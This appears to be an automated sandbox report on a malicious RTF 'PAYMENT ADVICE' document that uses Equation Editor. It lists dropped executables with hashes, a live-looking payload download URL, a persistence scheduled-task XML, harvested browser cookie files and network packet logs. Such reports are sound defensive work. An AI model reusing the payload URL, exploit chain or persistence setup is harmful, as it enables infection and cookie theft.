                                                                                                            • 104.21.51.99
                                                                                                            kkXJRT8vEl.exeGet hashmaliciousBrowse
                                                                                                            • 104.21.51.99
                                                                                                            kS2dqbsDwD.exeGet hashmaliciousBrowse
                                                                                                            • 104.25.234.53
                                                                                                            Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                            • 104.25.233.53

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                            Process:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                                                                                                            Category:dropped
                                                                                                            Size (bytes):61020
                                                                                                            Entropy (8bit):7.994886945086499
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                                                                                                            MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                                                                                                            SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                                                                                                            SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                                                                                                            SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                            Process:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):326
                                                                                                            Entropy (8bit):3.128132928323873
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kK5l5sqdoW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:mG5kPlE99SNxAhUe0et
                                                                                                            MD5:9B5941799D0326F5D38F79BAFF58369B
                                                                                                            SHA1:E636D57049B73BA03C807374AE7141E2251A7953
                                                                                                            SHA-256:16B2D9650A740EF9EBA55FE991AE95F716BAF0DBB3B94A30429D9CD3CBF02CDD
                                                                                                            SHA-512:04143BB2776F5F185B0A056029BB38DC828787B97ADBA0273DA44D104C9A94CF8DD300F50BA4BBB2EC7720779FCD5E6E0F3CF7AB1FA5F9DCC1B4B418C2056083
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview: p...... ........L+.lf...(....................................................... .........T'._......$...........\...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.6.5.4.2.7.7.5.f.d.7.1.:.0."...
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe
                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):918016
                                                                                                            Entropy (8bit):7.288418109516271
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:o8mDgYIvzz43Apj32FeC/V87ZXKzahp/:e1KHcApj3ql87EO
                                                                                                            MD5:E85A0E1E81ACBCEA6A0E10EEEDF32F6D
                                                                                                            SHA1:3C613A4D232645CCCBC7C1D8A3A8AFB54CD2D56C
                                                                                                            SHA-256:AE7399822AD5EF4D9BD2690DF74F6F1B472103380BE74FCA33611CE7265EBC01
                                                                                                            SHA-512:E9CEF57CAA3EC7A32D526934BF83154E555B0577629FA527028AD9D6385C80629917A2C46BE82388616A670F0830F4EB23A883A2CB34DF7EC28330A7A1B4E77A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                                            Reputation:low
                                                                                                            IE Cache URL:http://maritradeshipplng.com/wayss/okilo.exe
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y..`.................V..........nu... ........@.. ....................................@................................. u..K............................`....................................................... ............... ..H............text...tU... ...V.................. ..`.sdata...............Z..............@....rsrc................\..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7621A4C2-B642-4F8D-8632-93AA6D767CE8}.tmp
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1034
                                                                                                            Entropy (8bit):1.9979633320383752
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:3TURdO2GPUXoDIlulDx9vlk56/buvq2Zf/h:Cd+PMplulDbvy56/bunf/h
                                                                                                            MD5:A0992BC512D99AC859A0EF0FDE87A283
                                                                                                            SHA1:978E5F05BFF696D3579CBFCBE869CC586F723A21
                                                                                                            SHA-256:1947CED15B6C19F1F910A911FBC3BFB77ABD80B441D029FE60C2DFB0E4B6850F
                                                                                                            SHA-512:DE3D1AFB6DE9845A746A26E3F5195504C58DD5059C15B581731C42561F504F46CD62120EA14F0B6101FE7B31080741589EB45242C4789DC2ED109D90449DC0C5
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3.9.5.8.6.5.8.9. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . .R.s.3.I.f.w.q.8.j.D.v.R.J.B.6.x.0._.j.k.n.4.w.P.A.6.b.M.q.k.t.3.F.I.D.O.W.s.Y.V.4.p.6.r.J.V.A.Z.e.A.J.1.r.A.l.c.S.Q.1.w.Z.B.k.0.t.s.w.u.0.M. . . . . . . . . . . . . . . .9.3.4.1.3.6.2.6.6.9.3.4.1.3.6.2.6.6.=....... .E.q.u.a.t.i.o.n...3.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5F1B80B-61BE-41BF-89DB-AF92964D1C77}.tmp
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1024
                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\Cab1C98.tmp
                                                                                                            Process:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                                                                                                            Category:dropped
                                                                                                            Size (bytes):61020
                                                                                                            Entropy (8bit):7.994886945086499
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                                                                                                            MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                                                                                                            SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                                                                                                            SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                                                                                                            SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                                                                                                            C:\Users\user\AppData\Local\Temp\Tar1C99.tmp
                                                                                                            Process:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):158974
                                                                                                            Entropy (8bit):6.311775051607851
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:ilqXley2pR737/99UF210gNucQodv+1//dMrYJntYyjCQx7s2t6OGP:iQXipR7O/gNuc/v+lXjCQ7sO0
                                                                                                            MD5:E4731F8A3E7352DBA44EC7D3DD15BAEA
                                                                                                            SHA1:D5CA0025FBD356DEB8EDE35001F93039625562A5
                                                                                                            SHA-256:6C78EF77ACEF978321CCD30EE126FB7D30285BC186DDBDBE8B3E8F6E69D01353
                                                                                                            SHA-512:E68BA11A73E28404A274F0EE4ECC97A8BEFEDB91A20BDC5B00C72AE8928DD63924E351BE8A88E40960D54CE07E21EA21710DB0DFA00A5558C4264490E27B6988
                                                                                                            Malicious:false
                                                                                                            Preview: 0..l...*.H.........l.0..l....1.0...`.H.e......0..\...+.....7.....\.0..\.0...+.....7........_.T.....210611210413Z0...+......0..\.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                            C:\Users\user\AppData\Local\Temp\tmp2E52.tmp
                                                                                                            Process:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1619
                                                                                                            Entropy (8bit):5.149515696926573
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBItn:cbhZ7ClNQi/rydbz9I3YODOLNdq3I
                                                                                                            MD5:70A159A3BAD5639BFBC4FB11D77059B7
                                                                                                            SHA1:233D04B3ACAF4ED93FF029B11099CE048A0376B5
                                                                                                            SHA-256:7FB966A4E0F49D41ECE7FEA26CB4AEF90466119D8F00C84E0195D5F5AACC3880
                                                                                                            SHA-512:E84C3AD4DEBA2B2938A17CA12C1A610969BC53BCE12C752231A064ACE1E3747BBB73AC8574B91C647F857ABED5201D0674483EA7FA6FB4D1BE4AECC0EEF4E2DA
                                                                                                            Malicious:true
                                                                                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                                            C:\Users\user\AppData\Roaming\1ht4xmev.key\Chrome\Default\Cookies
                                                                                                            Process:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):0.9650411582864293
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                                                            MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                                                            SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                                                            SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                                                            SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                                                            Malicious:false
                                                                                                            Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Roaming\1ht4xmev.key\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                                                                                                            Process:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000
                                                                                                            Category:modified
                                                                                                            Size (bytes):524288
                                                                                                            Entropy (8bit):0.08107860342777487
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                                                                                            MD5:1138F6578C48F43C5597EE203AFF5B27
                                                                                                            SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                                                                                            SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                                                                                            SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                                                                                            Malicious:false
                                                                                                            Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Roaming\JxCmQoa.exe
                                                                                                            Process:C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):918016
                                                                                                            Entropy (8bit):7.288418109516271
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:o8mDgYIvzz43Apj32FeC/V87ZXKzahp/:e1KHcApj3ql87EO
                                                                                                            MD5:E85A0E1E81ACBCEA6A0E10EEEDF32F6D
                                                                                                            SHA1:3C613A4D232645CCCBC7C1D8A3A8AFB54CD2D56C
                                                                                                            SHA-256:AE7399822AD5EF4D9BD2690DF74F6F1B472103380BE74FCA33611CE7265EBC01
                                                                                                            SHA-512:E9CEF57CAA3EC7A32D526934BF83154E555B0577629FA527028AD9D6385C80629917A2C46BE82388616A670F0830F4EB23A883A2CB34DF7EC28330A7A1B4E77A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y..`.................V..........nu... ........@.. ....................................@................................. u..K............................`....................................................... ............... ..H............text...tU... ...V.................. ..`.sdata...............Z..............@....rsrc................\..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PAYMENT ADVICE.LNK
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Thu Jul 22 23:30:34 2021, length=4547, window=hide
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2068
                                                                                                            Entropy (8bit):4.590149997036641
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:8Fh/XTFGqg2M2zVQh2Fh/XTFGqg2M2zVQ/:8T/XJGqgV2zVQh2T/XJGqgV2zVQ/
                                                                                                            MD5:E07040CE2E1AB565DEA33B6137C4F158
                                                                                                            SHA1:854E081D9152EB535A0398506966A7E38DFC3D99
                                                                                                            SHA-256:EDA2AD4E4EC04F2A59192A7695D7B5FBE167F30DDC9711FDD6C6E3A7372E7ED6
                                                                                                            SHA-512:C01267CF2A6F6AA2DBCCCA689317D85C8503034E164641CEDD0F44A8CE0BAE7D53AE6A8B55E73268D736F8A7B2237FEDAFA08CC0455E107E5855027EF458183E
                                                                                                            Malicious:false
                                                                                                            Preview: L..................F.... ...a....{..a....{...{..Y................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2......R.. .PAYMEN~1.DOC..R.......Q.y.Q.y*...8.....................P.A.Y.M.E.N.T. .A.D.V.I.C.E...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\PAYMENT ADVICE.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.A.Y.M.E.N.T. .A.D.V.I.C.E...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9F.C...........[D_
                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):80
                                                                                                            Entropy (8bit):4.492965207485577
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:M1u8ogSgA4otDSgA4omX1u8ogSgA4ov:Ms8ogT3mDT3G8ogT3y
                                                                                                            MD5:A09DEABB3E8DDD44DB8D4057AE8690F3
                                                                                                            SHA1:67FD33C2F0245E33C3E9BD53CB5DB26BF3FED334
                                                                                                            SHA-256:514B4256FBDA9C731E7FC89315FBD71DB3533B8DC3EDB6A3554B40E4D3CD144C
                                                                                                            SHA-512:68CDD62A756742E7062DE36482C30B7A4154425A7428C0BA7A11F02622DF0A92FD68664A738413DE514264785B1EE1953767A6E8D24AE3E78E82A4E90582F0F3
                                                                                                            Malicious:false
                                                                                                            Preview: [doc]..PAYMENT ADVICE.LNK=0..PAYMENT ADVICE.LNK=0..[doc]..PAYMENT ADVICE.LNK=0..
                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):162
                                                                                                            Entropy (8bit):2.4311600611816426
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                                                                                                            MD5:390880DCFAA790037FA37F50A7080387
                                                                                                            SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                                                                                                            SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                                                                                                            SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                                                                                                            Malicious:false
                                                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                                                            C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):918016
                                                                                                            Entropy (8bit):7.288418109516271
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:o8mDgYIvzz43Apj32FeC/V87ZXKzahp/:e1KHcApj3ql87EO
                                                                                                            MD5:E85A0E1E81ACBCEA6A0E10EEEDF32F6D
                                                                                                            SHA1:3C613A4D232645CCCBC7C1D8A3A8AFB54CD2D56C
                                                                                                            SHA-256:AE7399822AD5EF4D9BD2690DF74F6F1B472103380BE74FCA33611CE7265EBC01
                                                                                                            SHA-512:E9CEF57CAA3EC7A32D526934BF83154E555B0577629FA527028AD9D6385C80629917A2C46BE82388616A670F0830F4EB23A883A2CB34DF7EC28330A7A1B4E77A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y..`.................V..........nu... ........@.. ....................................@................................. u..K............................`....................................................... ............... ..H............text...tU... ...V.................. ..`.sdata...............Z..............@....rsrc................\..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\Desktop\~$YMENT ADVICE.doc
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):162
                                                                                                            Entropy (8bit):2.4311600611816426
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                                                                                                            MD5:390880DCFAA790037FA37F50A7080387
                                                                                                            SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                                                                                                            SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                                                                                                            SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                                                                                                            Malicious:false
                                                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:Rich Text Format data, unknown version
                                                                                                            Entropy (8bit):4.336591266390289
                                                                                                            TrID:
                                                                                                            • Rich Text Format (5005/1) 55.56%
                                                                                                            • Rich Text Format (4004/1) 44.44%
                                                                                                            File name:PAYMENT ADVICE.doc
                                                                                                            File size:4547
                                                                                                            MD5:71af183490ef5c747eb3b6a1417c8f33
                                                                                                            SHA1:cbf5c744909fb1978d8bbadb3b1377e7b364f90d
                                                                                                            SHA256:fd1d1d4f70fb3b258e798ba9ac66abd6ad9d9de16b4b2204f55519ea59eb7d12
                                                                                                            SHA512:73e271f3eb303443808c22f9e41d9d3d72d0d0451c7e94343beceb04a3aa486fa236fef6d72cff8d4e04fa2ae0478943edeff695d9eb95855171daa57c133c77
                                                                                                            SSDEEP:96:pyfv7sySj/d6PsRfPkElCaGjc9OqzL5ud9YPm2KJbe:pyfvoySDgPsR3VlCbjEOWud60be
                                                                                                            File Content Preview:{\rtf6315{\object39586589 39586589 \'' \objocx4068557\~\objupdate6450751164507511 \objw6021\objh2310{\*\objdata363922 {{{{{{{{{{{{{{{{{{{{{{{{{{{{

                                                                                                            File Icon

                                                                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                                                                            Static RTF Info

                                                                                                            Objects

                                                                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                            000000133hno
                                                                                                            1000000DEh2embeddedEquaTioN.31903no

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jul 22, 2021 17:30:49.580652952 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:49.632972956 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:49.633526087 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:49.633574009 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:49.685611963 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002737045 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002769947 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002790928 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002810001 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002815008 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.002831936 CEST8049167104.21.27.166192.168.2.22
                                                                                                            Jul 22, 2021 17:30:50.002842903 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.002849102 CEST4916780192.168.2.22104.21.27.166
                                                                                                            Jul 22, 2021 17:30:50.002854109 CEST4916780192.168.2.22104.21.27.166
